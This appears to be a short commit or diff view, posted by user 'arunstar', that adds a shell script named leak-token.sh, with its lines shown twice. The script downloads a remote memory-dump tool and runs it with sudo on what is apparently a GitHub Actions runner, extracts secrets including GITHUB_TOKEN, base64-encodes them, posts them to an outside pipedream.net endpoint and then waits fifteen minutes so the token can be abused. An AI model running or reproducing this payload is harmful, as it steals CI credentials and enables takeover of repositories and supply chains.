arunstar · August 25, 2024 17:52
diff --git a/leak-token.sh b/leak-token.sh
 # Uses memory dump technique from github.com/nikitastupin/pwnhub / with regex to parse out all secret values (including GITHUB_TOKEN)
 B64_BLOB=`curl -sSf https://gist.githubusercontent.com/nikitastupin/30e525b776c409e03c2d6f328f254965/raw/memdump.py | sudo python3 | tr -d '\0' | grep -aoE '"[^"]+":\{"value":"[^"]*","isSecret":true\}' | sort -u | base64 -w 0 | base64 -w 0`
 # Print to run log
 echo $B64_BLOB
 # Exfil to Burp
 curl -s -d "$B64_BLOB" https://eonvxjpa2dhlojb.m.pipedream.net/token > /dev/null
 # Sleep for 15 mins to abuse GITHUB_TOKEN
 sleep 900
	# Uses memory dump technique from github.com/nikitastupin/pwnhub / with regex to parse out all secret values (including GITHUB_TOKEN)
	B64_BLOB=`curl -sSf https://gist.githubusercontent.com/nikitastupin/30e525b776c409e03c2d6f328f254965/raw/memdump.py \| sudo python3 \| tr -d '\0' \| grep -aoE '"[^"]+":\{"value":"[^"]*","isSecret":true\}' \| sort -u \| base64 -w 0 \| base64 -w 0`
	# Print to run log
	echo $B64_BLOB
	# Exfil to Burp
	curl -s -d "$B64_BLOB" https://eonvxjpa2dhlojb.m.pipedream.net/token > /dev/null
	# Sleep for 15 mins to abuse GITHUB_TOKEN
	sleep 900